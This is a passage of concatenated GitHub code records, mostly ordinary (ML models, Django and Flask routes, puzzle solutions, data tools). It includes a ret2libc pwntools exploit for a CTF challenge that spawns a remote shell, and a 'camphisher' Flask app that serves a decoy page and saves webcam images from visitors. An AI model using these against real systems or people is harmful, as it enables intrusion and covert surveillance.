self.layer6(out)\n out = self.layer7(out)\n out = self.conv2(out)\n out = self.avg_pool(out)\n out = self.conv3(out)\n out = out.view(out.shape[0], -1)\n return out\n \n \n def _make_layer(self, 
t, c1, c2, n, s):\n layers = []\n layers.append(BottleNeck(t, c1, c2, s))\n \n for i in range(1, n):\n layers.append(BottleNeck(t, c2, c2, s=1))\n\n return nn.Sequential(*layers)\n\ndef loadModel(model):\n if model == \"mobileNetV2\":\n model = MobileNetV2(inchannels=1)\n return model\n\n\n\n\n\n\n","repo_name":"xiaocao-tian/Net","sub_path":"MobileNetV2/mobileNetV2.py","file_name":"mobileNetV2.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21119473145","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"wiki/\", views.entry, name=\"entry\"),\n path(\"search\", views.search, name=\"search\"),\n path(\"newEntry\", views.createEntry, name=\"createEntry\"),\n path(\"wiki/edit/\", views.editEntry, name=\"editEntry\"),\n path(\"random\", views.randomEntry, name=\"randomEntry\"),\n]","repo_name":"Fractalbuilder/Wiki","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38289726997","text":"from flask import Flask,render_template,request\nimport base64, os,time,requests\nfrom binascii import a2b_base64\nfrom flask_ngrok import run_with_ngrok\n\nindex='index.html'\nurl ='https://www.cuemath.com/maths/maths-formulas-for-class-10/'\n\nwith open('est.html','r') as f:\n\test = f.read()\n\napp = Flask(__name__)\nrun_with_ngrok(app)\n\n@app.route('/')\ndef home():\n\treturn render_template(index)\n@app.route('/est')\ndef ester():\n\treq= requests.get(url)\n\ttext= req.text\n\treturn est\n@app.route('/post',methods=[\"POST\",'GET'])\ndef post():\n\t\tif request.method == 'POST':\n\t\t\tdatauri = request.get_json()['data']\n\t\t\tpos = datauri.find(',')+1\n\t\t\tdata=datauri[pos:]\n\t\t\tbinary_data = a2b_base64(data)\n\t\t\tfd = open(f'image_{time.time()}.jpeg', 'wb')\n\t\t\tfd.write(binary_data)\n\t\t\tfd.close()\n\t\t\tprint('Captured')\n\t\treturn 'posted'\n\t\t\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"programmingwithprince/camphisher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19822651124","text":"# Author: Arabian Coconut\n# Last Modified: 17/09/2023\nimport moneycontrol.moneycontrol_api as mc\nimport moneycontrol.storage_control as sc\nfrom flask import Flask, request, jsonify, render_template\n\napp = Flask(__name__)\nsc_instance= sc.StorageControl(\"data.pkl\")\n\n\n@app.route('/api/', methods=['GET'])\ndef api(news):\n \"\"\"\n Gets the news from the given URL and returns a JSON object containing the title, link,\n and date of the news.\n\n Parameters:\n url (string): The URL from which to retrieve the news\n\n Returns: json_data (JSON object): A JSON object containing the title, link, and date of the news, business news,\n and latest news.\n \"\"\"\n if request.method == 'GET':\n if news == 'news':\n return jsonify(mc.get_news())\n elif news == 'business':\n return jsonify(mc.get_business_news())\n elif news == 'latest':\n return jsonify(mc.get_latest_news())\n elif news == 'list':\n sc_instance.convert_to_json()\n return jsonify(open(sc_instance.json_path(), 'r').read())\n elif news == 'status':\n return jsonify({\"status\": \"200\"})\n else:\n return jsonify({\"error\": \"Method not allowed or 
server error\"})\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')","repo_name":"ArabianCoconut/Moneycontrol_api","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"6756852986","text":"'''\r\nExercise#02: Read an html file and extract all the links and write to another file. Assume that in one line there is one url.\r\n'''\r\nwith open('file8.html', 'r') as webpage:\r\n with open('file9.txt', 'a') as wf:\r\n # do kam hu skte hain ek tou start se read kr skte hai or dsra direct body se jo bhtr rhega but yahan start se krege\r\n for line in webpage.readlines():\r\n if ' int:\n pivot = 0\n left = 0\n right = len(nums)-1\n\n while left < right:\n pivot = (right + left) // 2\n if nums[pivot] < nums[pivot-1]:\n break\n if nums[pivot+1] < nums[pivot]:\n pivot += 1\n break\n if nums[left] < nums[pivot]:\n left = pivot + 1\n else:\n right = pivot - 1\n lresult = self.binary_search(nums, target, 0, pivot)\n rresult = self.binary_search(nums, target, pivot, len(nums) - 1)\n # print(\"pivot\", pivot, \"lresult\", lresult, \"rresult\", rresult)\n return max(lresult, rresult)\n\n def binary_search(self, nums: List[int], target: int, lo: int, hi: int):\n while lo <= hi:\n mid = (hi + lo) // 2\n # print(f\"lo {lo:2} mid {mid:2} hi {hi:2} \")\n if target == nums[mid]:\n return mid\n elif target < nums[mid]:\n hi = mid - 1\n else:\n lo = mid + 1\n return -1\n\n def search2(self, nums: List[int], target: int) -> int:\n # see https://leetcode.com/problems/search-in-rotated-sorted-array/discuss/14437/Python-binary-search-solution-O(logn)-48ms\n lo = 0\n hi = len(nums) - 1\n\n while lo <= hi:\n mid = (lo + hi) // 2\n # print(f\"lo {lo:2} mid {mid:2} hi {hi:2} \")\n if nums[mid] == target:\n return mid\n elif nums[lo] <= nums[mid]:\n if nums[lo] <= target <= nums[mid]:\n hi = mid - 1\n else:\n lo = mid + 1\n else:\n if nums[mid] <= target <= nums[hi]:\n lo = mid + 1\n else:\n hi = mid - 1\n\n # print(\"didn't find result\")\n return -1\n\ns = Solution()\n\nassert s.search([4,5,6,7,0,1,2],0) == 4\nassert s.search([4,5,6,7,0,1,2],3) == -1\nassert s.search([1],0) == -1\n\nlst = list(range(32))\n\nfor i in lst:\n rotated = lst[~i+1:] + lst[0:~i+1]\n # print(f\"{i:2}\", rotated)\n assert s.search(rotated, 0) == i\n assert s.search2(rotated, 0) == i\n","repo_name":"kennyu/problems","sub_path":"033_search_in_rotated_array.py","file_name":"033_search_in_rotated_array.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"242972156","text":"import pygame\nfrom threading import Thread\n\nimport sys\nfrom src.contants.Constants import WHITE, FPS\nimport src.inputs.Input as InputModule\nfrom src.facade import Facade\nfrom src.maths import Maths\nfrom src.facade.Facade import fpsClock\n\n\nclass Task(Thread):\n def __init__(self, job):\n Thread.__init__(self)\n self.job = job\n\n def run(self):\n self.job.do()\n\n\nclass OutputDrawer(object):\n def __init__(self, window, list_to_draw):\n # Set up the window\n pygame.display.set_caption('CyberMania')\n self.window = window\n self.listToDraw = list_to_draw\n\n def do(self):\n try:\n self.window.fill(WHITE)\n for toDraw in self.listToDraw:\n toDraw.draw(self.window)\n pygame.display.update()\n except pygame.error:\n print(\"pygame exited, stopping thread\")\n Facade.isRunning = False\n\n\nclass 
InputsListener(object):\n def __init__(self, hero):\n self.hero = hero\n Facade.music.toogle()\n\n def do(self):\n InputModule.listen(self.hero)\n\n\nclass PositionUpdater(object):\n def __init__(self, list_of_object):\n self.listOfObject = list_of_object\n\n def do(self):\n for objects in self.listOfObject:\n Maths.update_position_of_object(objects)\n","repo_name":"VincentRavera/CyberMania","sub_path":"src/runtime/Runtime.py","file_name":"Runtime.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6576593476","text":"#!/usr/bin/env python\nfrom pwn import *\n\ncontext.update(arch='amd64')\nexe = './external'\nif args.REMOTE:\n libc = ELF('./libc-2.28.so')\nelse:\n libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')\ntyk = ELF('./external')\n\ndef start(argv=[], *a, **kw):\n '''Start the exploit against the target.'''\n if args.GDB:\n return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)\n else:\n if not args.REMOTE:\n return process([exe] + argv, *a, **kw)\n else:\n return remote('161.97.176.150', 9999)\n\ngdbscript = '''\nb *0x40126f\ncontinue\n'''.format(**locals())\n\nret = 0x000000000040101a\nsyscall = 0x0000000000401283\npop_rdi = 0x00000000004012f3\npop_rsi_r15 = 0x00000000004012f1\nwrite_syscall = 0x000000000040127c\n\n\nio = start()\n\n#dump memory got 0x404018 0x404018+0x38\n\nOFFSET = 88\nrop = b\"A\"* OFFSET\nrop += p64(pop_rdi) # 0x00000000004012f3: pop rdi; ret;\nrop += p64(1)\nrop += p64(pop_rsi_r15)\nrop += p64(0x404060) # pointer to stdout in libc\nrop += p64(0)\nrop += p64(write_syscall)\nrop += p64(pop_rdi) # 0x00000000004012f3: pop rdi; ret;\nrop += p64(0)\nrop += p64(pop_rsi_r15)\nrop += p64(0x404018) # got addr\nrop += p64(0)\n\nrop += p64(0x401086) # read @ libc to repair got - to chyba ten dlresolve\n\nrop += p64(pop_rdi) # main\n\nrop += p64(0x404020) # pointer to /bin/sh in got\n\nrop += p64(0x401233) # call puts (system)\n\nrop += p64(0xdeadbeef)\nrop += p64(0xdeadbeef)\nrop += p64(0xdeadbeef)\n\n\nio.recvuntil(\"> \")\nio.sendline(rop)\nleak = u64(io.recv(0x8))\nlog.info(\"stdout leak: \" + hex(leak))\nlibc_base = leak - 0x1bc760\nlog.info(\"libc base: \" + hex(libc_base))\n\nlog.info(\"repairing got\")\nlog.info(\"system @ libc: \"+ hex(libc.sym['system']))\n\n#io.recv()\n#io.send(open('./got', 'r', encoding = \"ISO-8859-1\").read())\nio.send(p64(libc_base + libc.sym['system'])+b\"/bin/sh\\x00\") # overwrite put@got with system and /bin/sh\n\nio.interactive()\n","repo_name":"embe221ed/CTFs","sub_path":"offshift/external/external.py","file_name":"external.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24642837919","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom datetime import datetime\r\n\r\nfrom flask_login import login_required, current_user\r\nfrom sqlalchemy import desc\r\nfrom flask import current_app, flash, render_template, request, redirect, url_for, jsonify, g\r\nfrom validator_collection import validators, checkers, errors\r\n\r\nfrom ..models import User, Post, Category, \\\r\nSavedArticle, Tag, AboutUs, ContactUs, load_user\r\nfrom ..data_retrieval import latest_added_articles\r\nfrom .email import contact_us_send_email\r\nfrom ..decorators import admin_required, account_state\r\nfrom .. 
import db\r\nfrom ..forms import is_valid_username\r\nfrom app.main import main\r\n\r\n\r\n\r\ntitle = \"Lang & Code - Home\"\r\n\r\n\r\n@main.before_app_request\r\n@account_state\r\ndef before_request():\r\n if request.accept_mimetypes['text/html'] > request.accept_mimetypes['application/json']:\r\n tags = Tag.query.all()\r\n categories = Category.query.all()\r\n g.tags = tags\r\n g.categories = categories\r\n if current_user.is_authenticated:\r\n if not current_user.confirmed:\r\n g.confirm_account = \"Please access your email and confirm your account.\"\r\n else:\r\n g.tags = None\r\n g.categories = None\r\n current_user.last_seen = datetime.utcnow()\r\n db.session.commit()\r\n\r\n\r\n########################## APP ############################\r\n##################################################################\r\n@main.route(\"/\")\r\ndef index():\r\n if current_user.is_authenticated:\r\n latest_articles = latest_added_articles(1)\r\n latest_articles_list = latest_added_articles(5)\r\n # for tags, we use the global g.tags defined in the before_request\r\n return render_template(\"authenticated_index.html\", \r\n title=title,\r\n latest_articles=latest_articles, \r\n latest_articles_list=latest_articles_list,\r\n tags=g.tags)\r\n return render_template(\"default_index.html\", title=title)\r\n\r\n\r\n@main.route(\"/users\", methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef users():\r\n title = \"Lang & Code - Users\"\r\n page = request.args.get('page', 1, type=int)\r\n if request.method == \"GET\":\r\n current_user.last_follower_view_time = datetime.utcnow()\r\n db.session.commit()\r\n users = User.query.paginate(\r\n page, current_app.config['USERS_PER_PAGE'], False)\r\n return render_template(\"users.html\", \r\n users=users.items, \r\n pagination=users,\r\n title=title)\r\n return render_template(\"users.html\", title=title)\r\n\r\n\r\n@main.route(\"/contact_us\", methods=[\"GET\", \"POST\"])\r\ndef contact_us():\r\n title = \"Lang & Code - Contact us\"\r\n if request.method == \"POST\":\r\n subject = request.form.get(\"subject\")\r\n body = request.form.get(\"body\")\r\n fullname = request.form.get(\"fullname\")\r\n email = request.form.get(\"email\")\r\n is_user = User.query.filter_by(email=email).first()\r\n if subject and body and email and fullname:\r\n contact_us_send_email(subject, body, email, fullname)\r\n if is_user:\r\n contact_us = ContactUs(is_user=True, \r\n user_id=is_user.id, \r\n subject=subject,\r\n seen=False, \r\n body=body)\r\n db.session.add(contact_us)\r\n db.session.commit()\r\n elif not is_user:\r\n contact_us = ContactUs(is_user=False, \r\n seen=False, \r\n fullname=fullname,\r\n email=email, \r\n subject=subject,\r\n body=body)\r\n db.session.add(contact_us)\r\n db.session.commit()\r\n flash('Thank you for contacting us. 
You will hear from us once we get to your email.')\r\n return redirect(url_for('main.index'))\r\n flash(\"All the inputs must be filled.\", \"is-danger\")\r\n return redirect(url_for(\"main.index\"))\r\n if request.method == \"GET\":\r\n return render_template(\"contact_us.html\", title=title)\r\n flash(\"Something went wrong.\", \"is-warning\")\r\n return redirect(url_for(\"main.index\"))\r\n\r\n\r\n@main.route(\"/report_bug\", methods=[\"GET\", \"POST\"])\r\ndef report_bug():\r\n title = \"Lang & Code - Report Bug\"\r\n if request.method == \"POST\":\r\n subject = request.form.get(\"subject\")\r\n body = request.form.get(\"body\")\r\n fullname = request.form.get(\"fullname\")\r\n email = request.form.get(\"email\")\r\n if subject and body and email and fullname:\r\n contact_us_send_email(subject, body, email, fullname)\r\n flash('Thank you for contacting us. You will hear from us once we get to your email.')\r\n return redirect(url_for('main.index'))\r\n flash(\"All the inputs must be filled.\", \"is-danger\")\r\n return redirect(url_for(\"main.index\"))\r\n if request.method == \"GET\":\r\n return render_template(\"contact_us.html\", title=title)\r\n flash(\"Something went wrong.\", \"is-warning\")\r\n return redirect(url_for(\"main.index\"))\r\n","repo_name":"MurphyAdam/Flask-Blog","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71099634012","text":"# Modules\nimport time\nfrom pysros.management import connect\nimport re\n\n\n# Body\nif __name__ == \"__main__\":\n ## Get the timesamp in the beginning of the command\n t1 = time.ticks_ms()\n\n ## Collect the information\n connect_obj = connect() \n results = connect_obj.cli(\"show router route-table | no-more\")\n connect_obj.disconnect()\n\n ## Processing results\n is_default_route_bool = True if re.search(r'0\\.0\\.0\\.0/0', results) else False\n\n num_routes_int = 0\n for line_str in results.splitlines():\n if re.match(r'^No\\. of Routes:', line_str):\n num_routes_int = int(re.sub(r'^No\\. of Routes: (\\d)$', r'\\1', line_str))\n\n print(\"Routes in routing table: {}\\nDoes default route exist: {}\".format(num_routes_int, is_default_route_bool))\n\n ## Get the timesamp at the end\n t2 = time.ticks_ms()\n\n ## Print time\n print(\"\\nCompleted in {} ms\".format(time.ticks_diff(t2, t1))) \n","repo_name":"karneliuk-com/nokia-sros-automation","sub_path":"pysros_mdcli_get_routes_sros.py","file_name":"pysros_mdcli_get_routes_sros.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"4506772795","text":"#!/usr/bin/python3\n\n\"\"\"Find the top (bottom) N rows identified by a key and sorted by a\nvalue column. 
The result will be N rows with unique keys, sorted\nby the top N value columns.\n\nExamples:\n\nGiven a dataset like:\n\n #fsdb -F t one two three\n 10\ta\t42\n 20\tb\t99\n 20\ta\t50\n\nand running it as:\n\n topn -n 2 -k two -v three\n\nWill produce:\n\n #fsdb -F t one two three\n 20\tb\t99\n 20\ta\t50\n\n(ie, one row for each a and b)\n\nOr:\n\n topn -n 1 -k two -v three\n\ncreates:\n\n #fsdb -F t one two three\n 20\tb\t99\n\n\"\"\"\n\nimport sys\nimport argparse\nimport pyfsdb\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=__doc__\n )\n\n parser.add_argument(\n \"-k\", \"--key\", default=\"key\", type=str, help=\"Name of the key column to use\"\n )\n\n parser.add_argument(\n \"-v\",\n \"--value\",\n default=\"value\",\n type=str,\n help=\"Name of the value column to use when sorting\",\n )\n\n parser.add_argument(\n \"-n\", \"--max-rows\", default=20, type=int, help=\"Number of rows to return\"\n )\n\n parser.add_argument(\n \"input_file\", type=argparse.FileType(\"r\"), nargs=\"?\", default=sys.stdin, help=\"\"\n )\n\n parser.add_argument(\n \"output_file\",\n type=argparse.FileType(\"w\"),\n nargs=\"?\",\n default=sys.stdout,\n help=\"\",\n )\n\n args = parser.parse_args()\n return args\n\n\ndef maybe_add_data(data_by_key, row, key_column, value_column, min_add_value, max_rows):\n if row[key_column] in data_by_key:\n # update the existing\n data_by_key[row[key_column]] = row\n else:\n # it's a new row, append it\n data_by_key[row[key_column]] = row\n # and maybe drop an old row\n if len(data_by_key) > max_rows:\n # need to drop the lowest, which also has min_add_value\n delete_this = min(\n data_by_key, key=lambda x: float(data_by_key[x][value_column])\n )\n del data_by_key[delete_this]\n\n # calculate he new minimum\n min_key = min(\n data_by_key, key=lambda x: float(data_by_key[x][value_column])\n )\n min_add_value = float(data_by_key[min_key][value_column])\n\n return min_add_value\n\n\ndef main():\n args = parse_args()\n\n fin = pyfsdb.Fsdb(file_handle=args.input_file)\n fout = pyfsdb.Fsdb(out_file_handle=args.output_file)\n fout.column_names = fin.column_names\n\n (key_column, value_column) = fin.get_column_numbers([args.key, args.value])\n min_add_value = None\n data_by_key = {}\n data_values = []\n for row in fin:\n if (\n row[value_column] is not None\n and row[value_column] != \"-\"\n and row[value_column] != \"\"\n ):\n if min_add_value is None or min_add_value < float(row[value_column]):\n min_add_value = maybe_add_data(\n data_by_key,\n row,\n key_column,\n value_column,\n min_add_value,\n args.max_rows,\n )\n elif row[key_column] in data_by_key and float(\n data_by_key[row[key_column]][value_column]\n ) < float(row[value_column]):\n min_add_value = maybe_add_data(\n data_by_key,\n row,\n key_column,\n value_column,\n min_add_value,\n args.max_rows,\n )\n\n for key in data_by_key:\n fout.append(data_by_key[key])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gawseed/pyfsdb","sub_path":"pyfsdb/tools/pdbtopn.py","file_name":"pdbtopn.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"20294078918","text":"import csv\nfrom dateutil import parser as date_parser\n\nimport xlrd\nfrom django.core.exceptions import ValidationError\n\n\nclass SpreadsheetParser(object):\n '''Parser for delimited or Excel files, which provides a file-like interface.\n\n You need to implement the 
`clean_record()` method to provide schema validation of your\n columns and rows while parsing.\n '''\n EXCEL_FILE_EXTENSIONS = ('xls', 'xlsx')\n DELIMITED_FILE_EXTENSIONS = ('csv', 'tsv')\n DELIMITER_LOOKUP = {\n 'tsv': '\\t'\n }\n\n # Arrays for primitive parsing\n booleans = integers = floats = dates = ()\n\n def __init__(self, input_file, file_type=None):\n '''Takes in the users file and validates the contents.\n '''\n self.file = input_file\n\n self.headers = []\n\n self.file_type = self.get_file_type() if file_type is None else file_type\n\n # Create the iterable for later\n self.generator = self.build_generator()\n\n def __iter__(self):\n '''Provides iteration over the rows of the file.\n '''\n return self.generator\n\n def get_file_type(self):\n '''What is the extension of the file provided.\n '''\n return self.file.name.split('.')[-1]\n\n def build_generator(self):\n '''Returns an iterable-generator for the file.\n '''\n parser = None\n if self.file_type in self.EXCEL_FILE_EXTENSIONS:\n parser = self.excel_parser\n elif self.file_type in self.DELIMITED_FILE_EXTENSIONS:\n parser = self.delimited_parser\n\n # If we didn't find a parser, complain about the file type we were given\n if parser is None:\n raise ValidationError('Invalid file extension `%s` provided' % self.file_type)\n\n # Invoke the parser to get results\n return parser()\n\n def delimited_parser(self):\n '''Parses delimited file with a given delimiter.\n '''\n delimiter = self.DELIMITER_LOOKUP.get(self.file_type, ',')\n reader = csv.DictReader(self.file, delimiter=delimiter)\n for record in reader:\n yield self.clean_record(record)\n\n def excel_parser(self):\n '''Parses Excel file into rows mimicing `csv.DictReader`.\n '''\n workbook = xlrd.open_workbook(file_contents=self.file.read(), on_demand=True)\n worksheet = workbook.sheet_by_index(0)\n\n # Extract the headers from the sheet\n for col in range(worksheet.ncols):\n self.headers.append(worksheet.cell_value(0, col))\n\n # Validate the individual rows now\n for row in range(1, worksheet.nrows):\n record = {}\n for column in range(worksheet.ncols):\n cell = worksheet.cell(row, column)\n value = cell.value\n if cell.ctype == xlrd.XL_CELL_NUMBER:\n value = int(cell.value)\n record[self.headers[column]] = str(value)\n\n # Validate and yield the record\n yield self.clean_record(record)\n\n def clean_record(self, record):\n '''Raises a `ValidationError` if the record doesn't match the expected format.\n\n Natively parses primitive types from class defined arrays.\n '''\n try:\n # Booleans\n for field in self.booleans:\n value = record[field].title()\n if value == 'True':\n record[field] = True\n elif value == 'False':\n record[field] = False\n else:\n record[field] = None\n\n # Integers\n for field in self.integers:\n try:\n record[field] = int(record[field])\n except ValueError:\n record[field] = None\n\n # Floats\n for field in self.floats:\n try:\n record[field] = float(record[field])\n except ValueError:\n record[field] = None\n\n # Datetimes\n for field in self.dates:\n record[field] = date_parser.parse(record[field])\n except (TypeError, ValueError):\n raise ValidationError('Unable to parse `%s` for field `%s`' % (record[field], field))\n\n return record\n","repo_name":"brian-lai/django-docker","sub_path":"core/utils/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29965344548","text":"import unittest\n\n\ndef 
read_puzzle_input(filename):\n with open(filename, 'r') as f:\n data = f.read()\n return data\n\n\ndef parse_data(data: str) -> list[(str, str)]:\n rval: list[(str, str)] = []\n for line in data.splitlines():\n h = len(line) // 2\n rval.append((line[0:h], line[h:]))\n return rval\n\n\ndef find_common_letter(s1: str, s2: str) -> str:\n for c1 in s1:\n for c2 in s2:\n if c1 == c2:\n return c1\n raise ValueError(f'No duplicate found in {s1} and {s2}')\n\n\ndef find_common_letter_for_three(s1: str, s2: str, s3: str):\n for c1 in s1:\n for c2 in s2:\n if c1 == c2 and c1 in s3:\n return c1\n raise ValueError(f'{s1}, {s2} and {s3} have no common char')\n\n\ndef lookup_type_rank(type: str) -> int:\n if type >= 'a' and type <= 'z':\n return ord(type) - ord('a') + 1\n if type >= 'A' and type <= 'Z':\n return ord(type) - ord('A') + 27\n raise ValueError(f'Expected a letter. Got {type} instead.')\n\n\ndef tally_ranks(rucksacks: (str, str)) -> int:\n tally = 0\n for rucksack in rucksacks:\n c = find_common_letter(rucksack[0], rucksack[1])\n tally += lookup_type_rank(c)\n return tally\n\n\ndef part_one(filename):\n data = read_puzzle_input(filename)\n rucksacks = parse_data(data)\n tally = tally_ranks(rucksacks)\n return tally\n\n\ndef part_two(filename):\n data = read_puzzle_input(filename)\n rucksacks = parse_data(data)\n tally = 0\n for i in range(0, len(rucksacks), 3):\n common_letter = find_common_letter_for_three(\n rucksacks[i][0] + rucksacks[i][1],\n rucksacks[i + 1][0] + rucksacks[i + 1][1],\n rucksacks[i + 2][0] + rucksacks[i + 2][1])\n tally += lookup_type_rank(common_letter)\n\n return tally\n\nfilename = \"Day_03_input.txt\"\nprint(f'Answer part one: {part_one(filename)}')\nprint(f'Answer part two: {part_two(filename)}')\n\n\nclass Test(unittest.TestCase):\n def test_part_two(self):\n self.assertEqual(70, part_two('Day_03_short_input.txt'))\n\n def test_parse_data(self):\n data = read_puzzle_input('Day_03_short_input.txt')\n rucksacks = parse_data(data)\n self.assertEqual('vJrwpWtwJgWr', rucksacks[0][0])\n self.assertEqual('hcsFMMfFFhFp', rucksacks[0][1])\n self.assertEqual('CrZsJsPPZsGz', rucksacks[5][0])\n self.assertEqual('wwsLwLmpwMDw', rucksacks[5][1])\n\n def test_find_common_letter(self):\n data = read_puzzle_input('Day_03_short_input.txt')\n rucksacks = parse_data(data)\n self.assertEqual('p', find_common_letter(rucksacks[0][0], rucksacks[0][1]))\n self.assertEqual('L', find_common_letter(rucksacks[1][0], rucksacks[1][1]))\n self.assertEqual('P', find_common_letter(rucksacks[2][0], rucksacks[2][1]))\n self.assertEqual('v', find_common_letter(rucksacks[3][0], rucksacks[3][1]))\n self.assertEqual('t', find_common_letter(rucksacks[4][0], rucksacks[4][1]))\n self.assertEqual('s', find_common_letter(rucksacks[5][0], rucksacks[5][1]))\n\n def test_lookup_type_rank(self):\n self.assertEqual(1, lookup_type_rank('a'))\n self.assertEqual(26, lookup_type_rank('z'))\n self.assertEqual(27, lookup_type_rank('A'))\n self.assertEqual(52, lookup_type_rank('Z'))\n\n def test_tally_ranks(self):\n data = read_puzzle_input('Day_03_short_input.txt')\n rucksacks = parse_data(data)\n self.assertEqual(157, tally_ranks(rucksacks))\n\n def test_find_common_letter_for_three(self):\n c = find_common_letter_for_three(\n 'vJrwpWtwJgWrhcsFMMfFFhFp',\n 'jqHRNqRjqzjGDLGLrsFMfFZSrLrFZsSL',\n 'PmmdzqPrVvPwwTWBwg')\n self.assertEqual('r', c)\n c = find_common_letter_for_three(\n 'wMqvLMZHhHMvwLHjbvcjnnSBnvTQFn',\n 'ttgJtRGJQctTZtZT',\n 'CrZsJsPPZsGzwwsLwLmpwMDw')\n self.assertEqual('Z', 
c)\n","repo_name":"rslinford/Advent_of_Code_2022","sub_path":"Day_03.py","file_name":"Day_03.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42549003064","text":"class Solution:\n def sort_list(self, list1, list2):\n indices = [i for i, x in sorted(enumerate(list2), key=lambda x: x[1])]\n arr = [list1[i] for i in indices]\n return arr\n\n def sortJumbled(self, mapping, nums):\n\n numberDict = {}\n for item in range(len(mapping)):\n numberDict[item] = mapping[item]\n changed_num = \"\"\n stack = []\n\n for item in nums:\n left, right = 0, len(str(item))\n while left < right:\n item = str(item)\n changed_num += str(numberDict[int(item[left])])\n left += 1\n stack.append(int(changed_num))\n changed_num = \"\"\n\n res = self.sort_list(nums, stack)\n return res\n\n\ns = Solution()\nprint(s.sortJumbled(mapping=[8, 9, 4, 0, 2, 1, 3, 5, 7, 6], nums=[991, 338, 38]))\nprint(s.sortJumbled(mapping=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], nums=[789, 456, 123]))\n","repo_name":"bipsec/Leet-Code","sub_path":"sort_the_jumbled_numbers.py","file_name":"sort_the_jumbled_numbers.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38637788791","text":"#!/usr/local/bin/python3\n\nimport argparse\nimport gensim\nfrom gensim.models.callbacks import WordEmbCheckpointSaver\nfrom glove_code.src.glove import Glove, NNConfig, InitializationConfig\nfrom util_scripts.get_model_eval_and_stats import *\nimport logging\nfrom nltk.corpus import brown\nimport numpy as np\nfrom numpy import float32 as REAL\nfrom numpy.linalg import norm\nimport os\nimport socket\nimport time\n\nMODEL_FILENAME_PATTERN = \"models/glove/{}/glove_ep{}_size{}_lr{}_vocab{}_{}\"\nINITIALIZATION_MODEL_FILENAME = {\n \"100D\": \"data/pretrained_models/glove_pretrained_100d_levy_vocab50k_cosh-dist-sq_bias\",\n \"vanilla_100D\": \"data/pretrained_models/glove_vanilla_pretrained_100d_levy_vocab50k_bias\",\n}\nif socket.gethostname() in [\"armin\", \"grinder\", \"mark\", \"youagain\", \"dalabgpu\"]: # DALAB machines\n INITIALIZATION_MODEL_FILENAME = {\n \"100D\": \"/media/hofmann-scratch/Octavian/alext/data/pretrained_models/glove_pretrained_100d_levy_vocab50k_cosh-dist-sq_bias\",\n \"vanilla_100D\": \"/media/hofmann-scratch/Octavian/alext/data/pretrained_models/glove_vanilla_pretrained_100d_levy_vocab50k_bias\",\n }\nelif \"lo-\" in socket.gethostname(): # Leonhard nodes\n INITIALIZATION_MODEL_FILENAME = {\n \"100D\": \"/cluster/scratch/tifreaa/data/pretrained_models/glove_pretrained_100d_levy_vocab50k_cosh-dist-sq_bias\",\n \"50x2D\": \"/cluster/scratch/tifreaa/data/pretrained_models/glove_pretrained_50x2D_ep50_levy_vocab50k_cosh-dist-sq_bias\",\n \"vanilla_100D\": \"/cluster/scratch/tifreaa/data/pretrained_models/glove_vanilla_pretrained_100d_levy_vocab50k_bias\",\n }\n\n\nSEM_GOOGLE_SIZE = 8869\nSYN_GOOGLE_SIZE = 10675\nGOOGLE_SIZE = 19544\nMSR_SIZE = 8000\n\n# IMPORTANT!!!!!!!!!!! First one for each embedding type should be the default.\nSUPPORTED_OPTIMIZERS = {\n \"vanilla\": [\"adagrad\"],\n \"euclid\": [\"adagrad\"],\n \"poincare\": [\"radagrad\", \"fullrsgd\", \"wfullrsgd\", \"ramsgrad\"],\n \"mix-poincare\": [\"mixradagrad\"],\n}\n\n# IMPORTANT!! 
